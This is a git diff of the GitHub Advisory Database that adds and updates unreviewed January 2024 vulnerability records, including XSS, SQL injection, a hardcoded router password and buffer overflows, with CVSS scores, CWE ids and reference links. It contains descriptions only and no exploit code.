b/advisories/unreviewed/2024/01/GHSA-2m5x-r2g7-72x8/GHSA-2m5x-r2g7-72x8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2m5x-r2g7-72x8", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2023-46230" + ], + "details": "In Splunk Add-on Builder versions below 4.1.4, the app writes sensitive information to internal log files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46230" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2024-0111" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2pj9-xmx5-6fv3/GHSA-2pj9-xmx5-6fv3.json b/advisories/unreviewed/2024/01/GHSA-2pj9-xmx5-6fv3/GHSA-2pj9-xmx5-6fv3.json index 3b81d6659c6f5..203177f645e57 100644 --- a/advisories/unreviewed/2024/01/GHSA-2pj9-xmx5-6fv3/GHSA-2pj9-xmx5-6fv3.json +++ b/advisories/unreviewed/2024/01/GHSA-2pj9-xmx5-6fv3/GHSA-2pj9-xmx5-6fv3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2pj9-xmx5-6fv3", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2022-48622" ], "details": "In GNOME GdkPixbuf (aka gdk-pixbuf) through 2.42.10, the ANI (Windows animated cursor) decoder encounters heap memory corruption (in ani_load_chunk in io-ani.c) when parsing chunks in a crafted .ani file. A crafted file could allow an attacker to overwrite heap metadata, leading to a denial of service or code execution attack. This occurs in gdk_pixbuf_set_option() in gdk-pixbuf.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T09:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-2rjw-5f3r-3xhq/GHSA-2rjw-5f3r-3xhq.json b/advisories/unreviewed/2024/01/GHSA-2rjw-5f3r-3xhq/GHSA-2rjw-5f3r-3xhq.json new file mode 100644 index 0000000000000..e9f04582ae1d0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2rjw-5f3r-3xhq/GHSA-2rjw-5f3r-3xhq.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2rjw-5f3r-3xhq", + "modified": "2024-01-30T06:30:23Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2023-45928" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45928" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2rq6-88fr-gr6r/GHSA-2rq6-88fr-gr6r.json b/advisories/unreviewed/2024/01/GHSA-2rq6-88fr-gr6r/GHSA-2rq6-88fr-gr6r.json index 8b5b31f37afa6..a4919760c9c3d 100644 --- a/advisories/unreviewed/2024/01/GHSA-2rq6-88fr-gr6r/GHSA-2rq6-88fr-gr6r.json +++ b/advisories/unreviewed/2024/01/GHSA-2rq6-88fr-gr6r/GHSA-2rq6-88fr-gr6r.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20963" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-2v2h-qr9f-cf9h/GHSA-2v2h-qr9f-cf9h.json b/advisories/unreviewed/2024/01/GHSA-2v2h-qr9f-cf9h/GHSA-2v2h-qr9f-cf9h.json new file mode 100644 index 0000000000000..b87e374b91d84 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2v2h-qr9f-cf9h/GHSA-2v2h-qr9f-cf9h.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2v2h-qr9f-cf9h", + "modified": "2024-01-29T09:30:24Z", + "published": "2024-01-29T09:30:24Z", + "aliases": [ + "CVE-2023-45916" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45916" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T09:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2w8f-25gq-9g77/GHSA-2w8f-25gq-9g77.json b/advisories/unreviewed/2024/01/GHSA-2w8f-25gq-9g77/GHSA-2w8f-25gq-9g77.json new file mode 100644 index 0000000000000..ff36c7e9fb52b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2w8f-25gq-9g77/GHSA-2w8f-25gq-9g77.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2w8f-25gq-9g77", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-5956" + ], + "details": "The Wp-Adv-Quiz WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5956" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/b3d1fbae-88c9-45d1-92c6-0a529b21e3b2/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2x33-pfvq-675c/GHSA-2x33-pfvq-675c.json b/advisories/unreviewed/2024/01/GHSA-2x33-pfvq-675c/GHSA-2x33-pfvq-675c.json new file mode 100644 index 0000000000000..b9da11d9af8db --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2x33-pfvq-675c/GHSA-2x33-pfvq-675c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x33-pfvq-675c", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24136" + ], + "details": "The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24136" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/2024_Math_Game_XSS" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2xh7-8hvj-mrr7/GHSA-2xh7-8hvj-mrr7.json b/advisories/unreviewed/2024/01/GHSA-2xh7-8hvj-mrr7/GHSA-2xh7-8hvj-mrr7.json new file mode 100644 index 0000000000000..7047b55299f68 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2xh7-8hvj-mrr7/GHSA-2xh7-8hvj-mrr7.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2xh7-8hvj-mrr7", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2024-22938" + ], + "details": "Insecure Permissions vulnerability in BossCMS v.1.3.0 allows a local attacker to execute arbitrary code and escalate privileges via the init function in admin.class.php component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22938" + }, + { + "type": "WEB", + "url": "https://github.com/n0Sleeper/bosscmsVuln/issues/1" + }, + { + "type": "WEB", + "url": "https://github.com/n0Sleeper/bosscmsVuln" + }, + { + "type": "WEB", + "url": "https://www.bosscms.net/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3365-3gc3-3q8c/GHSA-3365-3gc3-3q8c.json b/advisories/unreviewed/2024/01/GHSA-3365-3gc3-3q8c/GHSA-3365-3gc3-3q8c.json index 6d8cd037cd340..9f9539b5f9441 100644 --- a/advisories/unreviewed/2024/01/GHSA-3365-3gc3-3q8c/GHSA-3365-3gc3-3q8c.json +++ b/advisories/unreviewed/2024/01/GHSA-3365-3gc3-3q8c/GHSA-3365-3gc3-3q8c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3365-3gc3-3q8c", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-51201" ], "details": "Cleartext Transmission issue in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to access sensitive information via a man-in-the-middle attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-319" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json b/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json new file mode 100644 index 0000000000000..a9fe91a219ae1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33f3-88p6-j3f9", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-24324" + ], + "details": "TOTOLINK A8000RU v7.1cu.643_B20200521 was discovered to contain a hardcoded password for root stored in /etc/shadow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24324" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A8000RU/TOTOlink%20A8000RU%20hard%20code.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-33p8-v8q2-mx53/GHSA-33p8-v8q2-mx53.json b/advisories/unreviewed/2024/01/GHSA-33p8-v8q2-mx53/GHSA-33p8-v8q2-mx53.json index a6d7610bc36ff..0c660b89b6ffe 100644 --- a/advisories/unreviewed/2024/01/GHSA-33p8-v8q2-mx53/GHSA-33p8-v8q2-mx53.json +++ b/advisories/unreviewed/2024/01/GHSA-33p8-v8q2-mx53/GHSA-33p8-v8q2-mx53.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-33p8-v8q2-mx53", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47196" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47197.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-343v-9ccv-7535/GHSA-343v-9ccv-7535.json b/advisories/unreviewed/2024/01/GHSA-343v-9ccv-7535/GHSA-343v-9ccv-7535.json index 7f2be374e1cee..66a2f4db249eb 100644 --- a/advisories/unreviewed/2024/01/GHSA-343v-9ccv-7535/GHSA-343v-9ccv-7535.json +++ b/advisories/unreviewed/2024/01/GHSA-343v-9ccv-7535/GHSA-343v-9ccv-7535.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20952" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0002/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-3568-h36m-7jmf/GHSA-3568-h36m-7jmf.json b/advisories/unreviewed/2024/01/GHSA-3568-h36m-7jmf/GHSA-3568-h36m-7jmf.json index a97473e2604e5..0083176f37dec 100644 --- a/advisories/unreviewed/2024/01/GHSA-3568-h36m-7jmf/GHSA-3568-h36m-7jmf.json +++ b/advisories/unreviewed/2024/01/GHSA-3568-h36m-7jmf/GHSA-3568-h36m-7jmf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3568-h36m-7jmf", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0749" ], "details": "A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -41,9 +48,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-36xj-gcr2-cgrf/GHSA-36xj-gcr2-cgrf.json b/advisories/unreviewed/2024/01/GHSA-36xj-gcr2-cgrf/GHSA-36xj-gcr2-cgrf.json index aae1d9b755efe..723a7e9dde092 100644 --- a/advisories/unreviewed/2024/01/GHSA-36xj-gcr2-cgrf/GHSA-36xj-gcr2-cgrf.json +++ b/advisories/unreviewed/2024/01/GHSA-36xj-gcr2-cgrf/GHSA-36xj-gcr2-cgrf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-36xj-gcr2-cgrf", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T15:30:23Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51888" ], "details": "Buffer Overflow vulnerability in the nomath() function in Mathtex v.1.05 and before allows a remote attacker to cause a denial of service via a crafted string in the application URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-39g9-xc8h-ffgp/GHSA-39g9-xc8h-ffgp.json b/advisories/unreviewed/2024/01/GHSA-39g9-xc8h-ffgp/GHSA-39g9-xc8h-ffgp.json new file mode 100644 index 0000000000000..c864d5948a541 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-39g9-xc8h-ffgp/GHSA-39g9-xc8h-ffgp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39g9-xc8h-ffgp", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24134" + ], + "details": "Sourcecodester Online Food Menu 1.0 is vulnerable to Cross Site Scripting (XSS) via the 'Menu Name' and 'Description' fields in the Update Menu section.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24134" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/2024_Online_Food_Menu_XSS/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-39gr-m4xp-77wp/GHSA-39gr-m4xp-77wp.json b/advisories/unreviewed/2024/01/GHSA-39gr-m4xp-77wp/GHSA-39gr-m4xp-77wp.json new file mode 100644 index 0000000000000..d8427cee0905b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-39gr-m4xp-77wp/GHSA-39gr-m4xp-77wp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39gr-m4xp-77wp", + "modified": "2024-01-29T18:31:50Z", + "published": "2024-01-29T18:31:50Z", + "aliases": [ + "CVE-2023-1705" + ], + "details": "Missing Authorization vulnerability in Forcepoint F|One SmartEdge Agent on Windows (bgAutoinstaller service modules) allows Privilege Escalation, Functionality Bypass.This issue affects F|One SmartEdge Agent: before 1.7.0.230330-554.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1705" + }, + { + "type": "WEB", + "url": "https://support.forcepoint.com/s/article/000042333" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-39rp-fmqv-8wr2/GHSA-39rp-fmqv-8wr2.json b/advisories/unreviewed/2024/01/GHSA-39rp-fmqv-8wr2/GHSA-39rp-fmqv-8wr2.json new file mode 100644 index 0000000000000..6652b82417738 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-39rp-fmqv-8wr2/GHSA-39rp-fmqv-8wr2.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39rp-fmqv-8wr2", + "modified": "2024-01-31T09:30:18Z", + "published": "2024-01-31T09:30:18Z", + "aliases": [ + "CVE-2024-1012" + ], + "details": "A vulnerability, which was classified as critical, has been found in Wanhu ezOFFICE 11.1.0. This issue affects some unknown processing of the file defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp. The manipulation of the argument recordId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252281 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1012" + }, + { + "type": "WEB", + "url": "https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252281" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252281" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T08:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3cfc-hrv3-xpx5/GHSA-3cfc-hrv3-xpx5.json b/advisories/unreviewed/2024/01/GHSA-3cfc-hrv3-xpx5/GHSA-3cfc-hrv3-xpx5.json index d085aad0d27e0..f6eba10dfe318 100644 --- a/advisories/unreviewed/2024/01/GHSA-3cfc-hrv3-xpx5/GHSA-3cfc-hrv3-xpx5.json +++ b/advisories/unreviewed/2024/01/GHSA-3cfc-hrv3-xpx5/GHSA-3cfc-hrv3-xpx5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3cfc-hrv3-xpx5", - "modified": "2024-01-26T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:22Z", "aliases": [ "CVE-2023-48126" ], "details": "An issue in Luxe Beauty Clinic mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:56Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3crw-hq66-3456/GHSA-3crw-hq66-3456.json b/advisories/unreviewed/2024/01/GHSA-3crw-hq66-3456/GHSA-3crw-hq66-3456.json index af7b19708bb75..ef52e5fcf29c2 100644 --- a/advisories/unreviewed/2024/01/GHSA-3crw-hq66-3456/GHSA-3crw-hq66-3456.json +++ b/advisories/unreviewed/2024/01/GHSA-3crw-hq66-3456/GHSA-3crw-hq66-3456.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3crw-hq66-3456", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-51210" ], "details": "SQL injection vulnerability in Webkul Bundle Product 6.0.1 allows a remote attacker to execute arbitrary code via the id_product parameters in the UpdateProductQuantity function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-89" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T19:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3g75-6vfp-4hm3/GHSA-3g75-6vfp-4hm3.json b/advisories/unreviewed/2024/01/GHSA-3g75-6vfp-4hm3/GHSA-3g75-6vfp-4hm3.json index 9687ce636817b..6d4fe3cb5f105 100644 --- a/advisories/unreviewed/2024/01/GHSA-3g75-6vfp-4hm3/GHSA-3g75-6vfp-4hm3.json +++ b/advisories/unreviewed/2024/01/GHSA-3g75-6vfp-4hm3/GHSA-3g75-6vfp-4hm3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3g75-6vfp-4hm3", - "modified": "2024-01-27T03:30:21Z", + "modified": "2024-02-08T18:30:38Z", "published": "2024-01-27T03:30:21Z", "aliases": [ "CVE-2023-52389" ], "details": "UTF32Encoding.cpp in POCO has a Poco::UTF32Encoding integer overflow and resultant stack buffer overflow because Poco::UTF32Encoding::convert() and Poco::UTF32::queryConvert() may return a negative integer if a UTF-32 byte sequence evaluates to a value of 0x80000000 or higher. This is fixed in 1.11.8p2, 1.12.5p2, and 1.13.0.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-27T03:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3g98-33qx-2q68/GHSA-3g98-33qx-2q68.json b/advisories/unreviewed/2024/01/GHSA-3g98-33qx-2q68/GHSA-3g98-33qx-2q68.json new file mode 100644 index 0000000000000..6b1953ef72fa2 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3g98-33qx-2q68/GHSA-3g98-33qx-2q68.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3g98-33qx-2q68", + "modified": "2024-02-06T15:32:04Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22163" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shield Security Shield Security – Smart Bot Blocking & Intrusion Prevention Security allows Stored XSS.This issue affects Shield Security – Smart Bot Blocking & Intrusion Prevention Security: from n/a through 18.5.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22163" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-simple-firewall/wordpress-shield-security-plugin-18-5-7-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3gg4-v4m9-rj55/GHSA-3gg4-v4m9-rj55.json b/advisories/unreviewed/2024/01/GHSA-3gg4-v4m9-rj55/GHSA-3gg4-v4m9-rj55.json index 94c301cdac8c3..168c14304f6e9 100644 --- a/advisories/unreviewed/2024/01/GHSA-3gg4-v4m9-rj55/GHSA-3gg4-v4m9-rj55.json +++ b/advisories/unreviewed/2024/01/GHSA-3gg4-v4m9-rj55/GHSA-3gg4-v4m9-rj55.json @@ -32,7 +32,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-261" + "CWE-261", + "CWE-326" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-3gqv-8h4q-fff4/GHSA-3gqv-8h4q-fff4.json b/advisories/unreviewed/2024/01/GHSA-3gqv-8h4q-fff4/GHSA-3gqv-8h4q-fff4.json index 5c82c6426a460..be2bdd2e7c18c 100644 --- a/advisories/unreviewed/2024/01/GHSA-3gqv-8h4q-fff4/GHSA-3gqv-8h4q-fff4.json +++ b/advisories/unreviewed/2024/01/GHSA-3gqv-8h4q-fff4/GHSA-3gqv-8h4q-fff4.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-277" + "CWE-277", + "CWE-732" ], "severity": "MODERATE", "github_reviewed": false, diff --git 